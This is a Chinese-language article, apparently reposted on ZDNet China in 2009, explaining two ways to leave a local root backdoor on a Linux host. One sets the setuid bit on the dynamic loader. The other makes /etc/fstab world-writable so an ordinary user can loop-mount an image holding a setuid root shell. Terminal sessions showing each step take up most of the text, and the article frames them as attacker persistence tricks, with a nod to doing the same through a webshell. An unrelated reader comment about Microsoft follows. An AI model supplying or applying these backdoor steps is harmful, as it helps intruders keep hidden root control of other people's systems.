Linux下留本地后门的两个方法

ZDNet软件频道 时间:2009-11-04 作者: | 中国IT实验室 我要评论()
本文关键词:后门 系统安全 Linux
Linux下留本地后门的两个方法

  方法一:setuid的方法,其实8是很隐蔽。看看过程:

  [root@localdomain lib]# ls -l |grep ld-Linux

  lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-Linux.so.2 -> ld-2.7.so

  lrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-Linux.so.2

  [root@localdomain lib]# chmod +s ld-Linux.so.2

  [root@localdomain lib]# ls -l |grep ld-2.7.so

  -rwsr-sr-x 1 root root 128952 2007-10-18 04:49 ld-2.7.so

  lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-Linux.so.2 -> ld-2.7.so

  [root@localdomain lib]#

  我们这里给/lib/ld-Linux.so.2这个文件(在FC8里,它指向ld-2.7.so这个文件)加了setuid属性。然后我们看怎么利用它。

  普通用户登录,测试下权限:

  [xiaoyu@localdomain ~]$ whoami

  xiaoyu

  [xiaoyu@localdomain ~]$ /lib/ld-Linux.so.2 `which whoami`

  root

  [xiaoyu@localdomain ~]$

  恩,嘿嘿 root了吧,具体怎么生成root shell,你们自己去想吧,凡事都不要点得太透,对吧。呵呵,可以肯定的一点,/lib/ld-Linux.so.2 /bin/sh肯定生成不了rootshell, bash检查euid 和uid,看是否相等...OK,不多说了。

  方法二:

  看过程:

  [root@localdomain etc]# chmod a+w /etc/fstab

  [root@localdomain etc]#

  这就留好了。此方法比较XXOXX,估计没几个管理员知道。利用方法演示下

  [xiaoyu@localdomain ~]$ ls -l /etc/fstab

  -rw-rw-rw- 1 root root 456 2008-06-07 17:28 /etc/fstab

  [xiaoyu@localdomain ~]$ echo "test /mnt ext2 user,suid,exec,loop 0 0" >> /etc/fstab

  然后从本机把一个文件到目标机器上去,这里我们命名为test

  [xiaoyu@localdomain tmp]$ ls -l test

  -rw-rw-r-- 1 xiaoyu xiaoyu 102400 2008-04-20 02:51 test

  [xiaoyu@localdomain tmp]$ mount test

  [xiaoyu@localdomain tmp]$ cd /mnt

  [xiaoyu@localdomain mnt]$ ls -l

  total 18

  drwx------ 2 root root 12288 2008-04-20 05:44 lost+found

  -rwsr-sr-x 1 root root 4927 2008-04-20 05:44 root

  [xiaoyu@localdomain mnt]$ ./root

  sh-3.2#

  看到了吧,从普通用户提升到root了。呵呵。

  test这个文件baidu貌似木有上传功能撒,木办法传

  貌似可能有人说本地后门木啥鸟用,但是你要搞清楚:一个webshell里面就可以完成这一切....

用户评论
用户名
评论内容
发表时间
ZDNet网友
2011-03-18 14:57:01
ZDNet网友
2010-05-21 00:49:14
ZDNet网友
2010-05-21 00:48:00
ZDNet网友
微软应该对自己的用户负责,如果用户完全使用xp升级微软win7,为什么要付出这样麻烦的代价?都是微软出品软件,且都是利用该软件获取信息以及处理文字、多媒体功能,微软应该尽可能方便用户!虽然有时候这样的请求也许跟不上时代技术发展的脚步,但是微软不要以此为借口,认为一切都理所应当,就不可以方便用户。还是要尽力,所谓拿人手短吃人嘴软,商业不正是讲求有商道吗!至少做人需诚实守信,尽可能帮助用户顺利、安全转换操作系统、各种必须软件功能尽可能兼容以及信息尽可能的少丢失!虽然这很大程度仅仅取决于微软等计算机专家、工程师的自我自律约束,我们普通用户恐怕很难知道微软究竟仅了多大力量为用户考虑,但是我相信真相会有被发现的一天,无论多久远。 微软从某种意义上来说,就是一个类似“掌握魔方”操作特别出神入化的公司。几乎奠定了电脑主要的“规则”,但是,我却相信不久将来我们会发现,电脑依然是非常有限的一个小系统而已!随着我们新的关键材料认知突破,电脑系统会真正被另一个革命性新电脑系统所取代,不要以为我这样的说法是无稽之谈不可实现,我却认为很有可能,只看这样的情况发生究竟是快还是慢,是早还是迟!变成历史的小玩具之后的电脑系统,微软会留下良好的历史声名吗?我们拭目以待! 网友::我爱佛祖
2010-02-03 13:52:55
- 发表评论 -
匿名
注册用户

百度大联盟认证黄金会员Copyright© 1997- CNET Networks 版权所有。 ZDNet 是CNET Networks公司注册服务商标。
中华人民共和国电信与信息服务业务经营许可证编号:京ICP证010391号 京ICP备09041801号-159
京公网安备:1101082134